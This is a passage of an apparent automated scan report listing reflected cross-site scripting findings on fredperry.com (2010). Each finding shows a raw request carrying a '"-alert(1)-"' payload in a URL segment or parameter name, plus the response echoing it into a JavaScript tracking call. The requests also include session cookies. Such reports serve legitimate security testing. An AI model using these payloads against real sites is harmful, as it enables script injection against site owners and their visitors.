Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=02flunniengit26kuohu44o1c7; expires=Tue, 09-Nov-2010 17:10:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionaafcd"-alert(1)-"ca9f7a6b3df/men/new-styles/");
//]]>
...[SNIP]...

1.124. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c508"-alert(1)-"48cebfcb06f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men1c508"-alert(1)-"48cebfcb06f/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k1u51f38e8cm2j4krda42f2rm4; expires=Tue, 09-Nov-2010 17:10:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men1c508"-alert(1)-"48cebfcb06f/new-styles/");
//]]>
...[SNIP]...

1.125. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac829"-alert(1)-"50d8a14032a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/new-stylesac829"-alert(1)-"50d8a14032a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=59kn1i9dtbvkogr6rl1mvbt6b7; expires=Tue, 09-Nov-2010 17:11:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/new-stylesac829"-alert(1)-"50d8a14032a/");
//]]>
...[SNIP]...

1.126. http://www.fredperry.com/limited-edition/men/new-styles/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e7e"-alert(1)-"8e25b5ff5f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/new-styles/?76e7e"-alert(1)-"8e25b5ff5f5=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uii8f2bu4sdjkl14jhgqenv304; expires=Tue, 09-Nov-2010 17:09:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> New Sty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/new-styles/?76e7e"-alert(1)-"8e25b5ff5f5=1");
//]]>
...[SNIP]...

1.127. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3bbe"-alert(1)-"0ef1f74b959 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc3bbe"-alert(1)-"0ef1f74b959/men/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ahcu0t9dl58c4ic4fiimqkn4j4; expires=Tue, 09-Nov-2010 17:13:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc3bbe"-alert(1)-"0ef1f74b959/men/shirts/");
//]]>
...[SNIP]...

1.128. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b708"-alert(1)-"86e896e7b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men3b708"-alert(1)-"86e896e7b1/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hajrgog5oo0eacbkbp05vslkm4; expires=Tue, 09-Nov-2010 17:13:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men3b708"-alert(1)-"86e896e7b1/shirts/");
//]]>
...[SNIP]...

1.129. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c85"-alert(1)-"c119ad27ab7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shirts66c85"-alert(1)-"c119ad27ab7/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oba1oi45aktor2om73s3ubdli3; expires=Tue, 09-Nov-2010 17:14:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shirts66c85"-alert(1)-"c119ad27ab7/");
//]]>
...[SNIP]...

1.130. http://www.fredperry.com/limited-edition/men/shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d34bf"-alert(1)-"05db03a5909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shirts/?d34bf"-alert(1)-"05db03a5909=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3spam892hoo88moq3da5fa1633; expires=Tue, 09-Nov-2010 17:11:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shirts/?d34bf"-alert(1)-"05db03a5909=1");
//]]>
...[SNIP]...

1.131. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163c5"-alert(1)-"603148a5fb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition163c5"-alert(1)-"603148a5fb5/men/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ucne4doaae3jrhji44hi543ii4; expires=Tue, 09-Nov-2010 17:12:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition163c5"-alert(1)-"603148a5fb5/men/shorts/");
//]]>
...[SNIP]...

1.132. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd734"-alert(1)-"5870bc30553 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/mencd734"-alert(1)-"5870bc30553/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cmprdodont2kar3gf3rj1dhch7; expires=Tue, 09-Nov-2010 17:13:11 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/mencd734"-alert(1)-"5870bc30553/shorts/");
//]]>
...[SNIP]...

1.133. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a978"-alert(1)-"606c1d68e0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shorts1a978"-alert(1)-"606c1d68e0f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m979oncrcran81j6ldggdbvt02; expires=Tue, 09-Nov-2010 17:13:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shorts1a978"-alert(1)-"606c1d68e0f/");
//]]>
...[SNIP]...

1.134. http://www.fredperry.com/limited-edition/men/shorts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a1ac"-alert(1)-"94d6c0bb51d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shorts/?2a1ac"-alert(1)-"94d6c0bb51d=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n84oeqtbtkaimngalbhdh4b7p2; expires=Tue, 09-Nov-2010 17:12:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shorts/?2a1ac"-alert(1)-"94d6c0bb51d=1");
//]]>
...[SNIP]...

1.135. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822b3"-alert(1)-"b20e2f3dc25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition822b3"-alert(1)-"b20e2f3dc25/men/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t043khjde91qdmtguotmk6cul5; expires=Tue, 09-Nov-2010 17:12:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition822b3"-alert(1)-"b20e2f3dc25/men/trousers/");
//]]>
...[SNIP]...

1.136. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 341fe"-alert(1)-"31db44bf19f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men341fe"-alert(1)-"31db44bf19f/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ea8jb9ed3q44qqk7655vn8uep3; expires=Tue, 09-Nov-2010 17:12:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

